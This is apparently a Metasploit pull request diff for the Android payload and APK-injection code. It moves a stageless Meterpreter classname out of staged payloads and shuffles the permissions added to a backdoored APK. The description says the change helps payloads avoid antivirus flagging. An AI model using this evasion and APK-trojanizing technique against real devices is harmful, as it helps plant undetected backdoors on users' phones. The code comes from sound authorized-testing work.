### PR TITLE
Remove stageless classname from staged payloads, fixes #8034

### DIFF
--- a/lib/msf/core/payload/android.rb
+++ b/lib/msf/core/payload/android.rb
@@ -54,8 +54,9 @@ module Msf::Payload::Android
       transports: opts[:transport_config] || [transport_config(opts)]
     }
 
-    config = Rex::Payloads::Meterpreter::Config.new(config_opts)
-    config.to_b
+    config = Rex::Payloads::Meterpreter::Config.new(config_opts).to_b
+    config[0] = "\x01" if opts[:stageless]
+    config
   end
 
   def sign_jar(jar)
@@ -97,7 +98,6 @@ module Msf::Payload::Android
       # Add stageless classname at offset 8000
       config += "\x00" * (8000 - config.size)
       config += 'com.metasploit.meterpreter.AndroidMeterpreter'
-      config[0] = "\x01"
     else
       classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
     end

--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -78,23 +78,28 @@ class Msf::Payload::Apk
     original_permissions = original_manifest.xpath("//manifest/uses-permission")
 
     old_permissions = []
+    add_permissions = []
+
     original_permissions.each do |permission|
       name = permission.attribute("name").to_s
       old_permissions << name
     end
-    old_permissions.shuffle
 
     application = original_manifest.xpath('//manifest/application')
     payload_permissions.each do |permission|
       name = permission.attribute("name").to_s
       unless old_permissions.include?(name)
-        print_status("Adding #{name}")
-        if original_permissions.empty?
-          application.before(permission.to_xml)
-          original_permissions = original_manifest.xpath("//manifest/uses-permission")
-        else
-          original_permissions.before(permission.to_xml)
-        end
+        add_permissions += [permission.to_xml]
+      end
+    end
+    add_permissions.shuffle!
+    for permission_xml in add_permissions
+      print_status("Adding #{permission_xml}")
+      if original_permissions.empty?
+        application.before(permission_xml)
+        original_permissions = original_manifest.xpath("//manifest/uses-permission")
+      else
+        original_permissions.before(permission_xml)
       end
     end
 
@@ -215,9 +220,9 @@ class Msf::Payload::Apk
     package = amanifest.xpath("//manifest").first['package']
     package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
     classes = {}
-    classes['Payload'] = "#{Rex::Text::rand_text_alpha_lower(5)}".capitalize
-    classes['MainService'] = "#{Rex::Text::rand_text_alpha_lower(5)}".capitalize
-    classes['MainBroadcastReceiver'] = "#{Rex::Text::rand_text_alpha_lower(5)}".capitalize
+    classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize
+    classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize
+    classes['MainBroadcastReceiver'] = Rex::Text::rand_text_alpha_lower(5).capitalize
     package_slash = package.gsub(/\./, "/")
     print_status "Adding payload as package #{package}\n"
     payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")


### PR DESCRIPTION
This change requires https://github.com/rapid7/metasploit-payloads/pull/178

This change removes the com.metasploit.meterpreter.AndroidMeterpreter string from Payload.java, which was being flagged by AV on staged payloads, where it wasn't even required.

Fixes #8034 